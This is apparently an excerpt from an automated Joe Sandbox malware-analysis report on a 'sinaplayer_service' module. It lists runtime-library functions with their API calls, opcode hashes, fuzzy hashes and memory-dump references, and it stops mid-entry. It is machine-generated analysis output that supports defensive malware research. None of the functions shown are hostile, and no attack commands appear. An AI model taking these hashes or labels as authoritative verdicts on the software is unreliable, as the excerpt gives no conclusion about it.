                                                                                                                                                                                                    • _wcscspn.LIBCMT(6D0A81B3,_.,,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0A831B
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,00000040,6D0A81B3,00000000,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0A8367
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,00000010,6D0A81B5,0000000F,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0A83B0
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,?,?,?,?,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0DF768
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wcsncpy_s$_invoke_watson_wcscspnmemset
                                                                                                                                                                                                    • String ID: _.,
                                                                                                                                                                                                    • API String ID: 1770680180-2709443920
                                                                                                                                                                                                    • Opcode ID: 388abb90159c821bf9fe04964fbc453e780735b3bd542545b7f102d73af23ed1
                                                                                                                                                                                                    • Instruction ID: 820aca34a48bd57de091716d97e99a8aade20b15b8d5d29333fcef8f4e8af9e5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 388abb90159c821bf9fe04964fbc453e780735b3bd542545b7f102d73af23ed1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 461123729083C66EFB108AA88850BBE37B8EF01764F58401EFE95AF182DB70DD41D655
                                                                                                                                                                                                    Function 6D0A82D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,000001CA,97AFC1B1,00000000,00000055,00000000,?,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0A82EF
                                                                                                                                                                                                    • _wcscspn.LIBCMT(6D0A81B3,_.,,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0A831B
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,00000040,6D0A81B3,00000000,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0A8367
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,00000010,6D0A81B5,0000000F,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0A83B0
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,?,?,?,?,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0DF768
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wcsncpy_s$_invoke_watson_wcscspnmemset
                                                                                                                                                                                                    • String ID: _.,
                                                                                                                                                                                                    • API String ID: 1770680180-2709443920
                                                                                                                                                                                                    • Opcode ID: 840eed42c024a1bb76632323264dc44d92e78051d6d24ce4b6d90643df761b18
                                                                                                                                                                                                    • Instruction ID: bc0000040b2f7390db25797b1c31ba39374c8ad3ece890bc840bbdf755eb70fa
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 840eed42c024a1bb76632323264dc44d92e78051d6d24ce4b6d90643df761b18
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F1129729042866EFB14CAA44850FBE37B8EF01764F58401EFE556F182DB70DD41D654
                                                                                                                                                                                                    Function 6D098E94 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RtlUnwind.KERNEL32(?,6D0B5811,80000026,00000000,?,?), ref: 6D0B580C
                                                                                                                                                                                                    • _local_unwind2.MSVCR120(?,?,?), ref: 6D0B5825
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Unwind_local_unwind2
                                                                                                                                                                                                    • String ID: &$02CV
                                                                                                                                                                                                    • API String ID: 2435528123-3673091860
                                                                                                                                                                                                    • Opcode ID: 51a1f730534b7c1f08a3a879e48923be33fc3382844a258dc1a4463b8bd84c05
                                                                                                                                                                                                    • Instruction ID: 7f218a480db43f3349063623ae069dfc1f718ce996b7b69820f6a0ebd8ff5430
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51a1f730534b7c1f08a3a879e48923be33fc3382844a258dc1a4463b8bd84c05
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9115B759086059FEB01DF44C894BAABBB4FB08310F5155A0E914AF386D376EC85CBE1
                                                                                                                                                                                                    Function 6D09EAF3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfowcslen
                                                                                                                                                                                                    • String ID: I
                                                                                                                                                                                                    • API String ID: 2689964535-3707901625
                                                                                                                                                                                                    • Opcode ID: 9c37a6a3ebfe66e9fcd513b538005e3099b3ebd00d8d87435b18cd7b5d3d85b2
                                                                                                                                                                                                    • Instruction ID: faeb82c51359758908ff4afdd47c654cf1f62810746cdc3a908f610455bb9fd1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c37a6a3ebfe66e9fcd513b538005e3099b3ebd00d8d87435b18cd7b5d3d85b2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46014072C0422A9BEF109FA8D8056FE7BB4FF05325F100616E934A71D0E77585118BA1
                                                                                                                                                                                                    Function 6D09ACD3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44stringCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfostrlen
                                                                                                                                                                                                    • String ID: I
                                                                                                                                                                                                    • API String ID: 1371076374-3707901625
                                                                                                                                                                                                    • Opcode ID: a5f64acb0cfe6047d5516fa7c526f73389597081c2670116c273927e34166219
                                                                                                                                                                                                    • Instruction ID: 611af4e6c98c0cfa0c96ba86f50233717a55ce381a464362dbfe797caf06703e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5f64acb0cfe6047d5516fa7c526f73389597081c2670116c273927e34166219
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D017171C1021A9BEF109FA8D8006FE7BB8FF09725F10061AF920AA1C0DB7585508BE5
                                                                                                                                                                                                    Function 6D0EF8AE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(?,00000000,.im,?,6D0D2519,00000000,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E), ref: 6D0EF8BD
                                                                                                                                                                                                      • Part of subcall function 6D0A3E7E: __EH_prolog3.LIBCMT ref: 6D0A3E85
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000,.im,?,6D0D2519,00000000,?,00000000,00000000,?,?,?,?,6D0A58C9), ref: 6D0EF8E2
                                                                                                                                                                                                    • GetProcessAffinityMask.KERNEL32(00000000,?,00000000), ref: 6D0EF8E9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ProcessVersion@$AffinityConcurrency@@CurrentH_prolog3Manager@1@MaskResource
                                                                                                                                                                                                    • String ID: .im
                                                                                                                                                                                                    • API String ID: 2898901060-4014146257
                                                                                                                                                                                                    • Opcode ID: 179ef4f7fc7df4849975fe43bcf3f308cd3e0b7f1953896b283386c24283fea3
                                                                                                                                                                                                    • Instruction ID: 6eac22ee8b45d11208cd44f1b28ee0eb0f5989e20d06b0eb96d1faebadea5089
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 179ef4f7fc7df4849975fe43bcf3f308cd3e0b7f1953896b283386c24283fea3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4F05E72220108BFAB10DFEDD844AABBBECEF1E2A07004426F609C7210D7B0E94087A1
                                                                                                                                                                                                    Function 6D0B3F3C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,FFFFFFFE,00000008,?,6D0B3FA2,00000000,?,6D0B427E,00000000,6D0B4238,0000001C,6D0FBBC7,00000000,00000001,00000000), ref: 6D0B3F4B
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(FFFFFFFE,CorExitProcess), ref: 6D0B3F5D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                    • API String ID: 1646373207-1276376045
                                                                                                                                                                                                    • Opcode ID: 05569b4252dbdf1541e4dd36d967234178ac6a55e82d8d0c544cf3e0380d0d5e
                                                                                                                                                                                                    • Instruction ID: 876ac96d714be710df9aa074df0435ac97fc73d55ccaf74f0aa072600e83aaf6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05569b4252dbdf1541e4dd36d967234178ac6a55e82d8d0c544cf3e0380d0d5e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7FD0123011C10AFBFF109AE6DC05F7A7FBCAF05542F100164B819D0092DB72DA10A6A1
                                                                                                                                                                                                    Function 6D0EAF6F Relevance: 6.3, APIs: 5, Instructions: 17COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • free.MSVCR120(?,?,6D0EAF12), ref: 6D0EAF79
                                                                                                                                                                                                      • Part of subcall function 6D08ECE0: HeapFree.KERNEL32(00000000,00000000,?,6D0D3D3A,00000000,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D08ECF4
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,6D0EAF12), ref: 6D0EAF81
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,6D0EAF12), ref: 6D0EAF89
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,6D0EAF12), ref: 6D0EAF91
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,?,6D0EAF12), ref: 6D0EAF97
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$FreeHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 32654580-0
                                                                                                                                                                                                    • Opcode ID: 35c46fae50c05662356181fb7ad4d344ed15a287719cd2b1bd15bcf9abf46fa9
                                                                                                                                                                                                    • Instruction ID: c87c1bb9c8de552e358c1b971d29fe13e8d9a6b557d44f25716cd44c8346ad97
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35c46fae50c05662356181fb7ad4d344ed15a287719cd2b1bd15bcf9abf46fa9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16D05E31C09A225BEE222724ED03B4B76A17F022983030D24B581A36328B13A81296D4
                                                                                                                                                                                                    Function 6D0AE4B5 Relevance: 6.2, APIs: 4, Instructions: 221COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D08F764: _getptd.MSVCR120(00000001,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D08F77A
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,6D0B028F,00000000,00000000,0000000A,?,6D0DD096,?,?,00000010,00000000,00000000,00000000), ref: 6D0B267B
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,6D0B028F,00000000,00000000,0000000A,?,6D0DD096,?,?,00000010,00000000,00000000,00000000), ref: 6D0D6F90
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_getptd_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2821341848-0
                                                                                                                                                                                                    • Opcode ID: c78d6a05d8a0d560071064e9d90023594e76daec8ed1c1df4c57b2be8ba333f4
                                                                                                                                                                                                    • Instruction ID: 3ebed66b2d853c813e28571195e356a8c1e336b83e83a14c8421b03dc319d956
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c78d6a05d8a0d560071064e9d90023594e76daec8ed1c1df4c57b2be8ba333f4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5715930B5874A8FFB12CEA8C4917BE7BF1AF45314F58815AD8A0DB292E636D841CB41
                                                                                                                                                                                                    Function 6D09C79B Relevance: 6.2, APIs: 4, Instructions: 204COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • iswctype.MSVCR120(000000A0,00000008,000000A0,?,0000009C,?,?,?,6D129BDB,?,00000000), ref: 6D09C7DE
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: iswctype
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 304682654-0
                                                                                                                                                                                                    • Opcode ID: f458ca2586a78459268bcb4b736d6bb2edfedf0da226f2f39c6a32d6ccd335d1
                                                                                                                                                                                                    • Instruction ID: 6c375a21351cea161cfcc33ec3e8c3f47cbb6a334bd21cfd1327b52bf27860dd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f458ca2586a78459268bcb4b736d6bb2edfedf0da226f2f39c6a32d6ccd335d1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD511771E9C2168BFB218E1888803BF33E5FB46764FA0951BF8A59F1C0D7719941A619
                                                                                                                                                                                                    Function 6D09DCDD Relevance: 6.2, APIs: 4, Instructions: 202stringCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _mbtowc_l.MSVCR120(?,?,?,?), ref: 6D09DD43
                                                                                                                                                                                                      • Part of subcall function 6D09EF00: _isleadbyte_l.MSVCR120(?,?), ref: 6D09EF4B
                                                                                                                                                                                                      • Part of subcall function 6D09EF00: MultiByteToWideChar.KERNEL32(00000080,00000009,6D0D5D30,00000001,00000000,00000000), ref: 6D09EF73
                                                                                                                                                                                                    • strlen.MSVCR120(?), ref: 6D09DDBC
                                                                                                                                                                                                    • __forcdecpt_l.LIBCMT ref: 6D09DED6
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6D09DFCD
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide__forcdecpt_l_isleadbyte_l_mbtowc_lfreestrlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1852445238-0
                                                                                                                                                                                                    • Opcode ID: f854c27465edd3deb8e688565c5d5398108cbe2966b5ee17b3bfca693fab8457
                                                                                                                                                                                                    • Instruction ID: dc95dd53ddcd4dec1a894cc59acd69267700506775d2ab655f0605b5aa2d523a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f854c27465edd3deb8e688565c5d5398108cbe2966b5ee17b3bfca693fab8457
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 597130F1E4522A9AEF218B14CC80BEDB7B8EB85304F4150DAE708AB141D7759AC5DF68
                                                                                                                                                                                                    Function 6D09CF18 Relevance: 6.2, APIs: 4, Instructions: 192stringCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __forcdecpt_l_mbtowc_lstrlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 810383619-0
                                                                                                                                                                                                    • Opcode ID: e6205bd884e2f2c9398675e8af2c85c5044fc283ce3ba5cc6396f99fdc022120
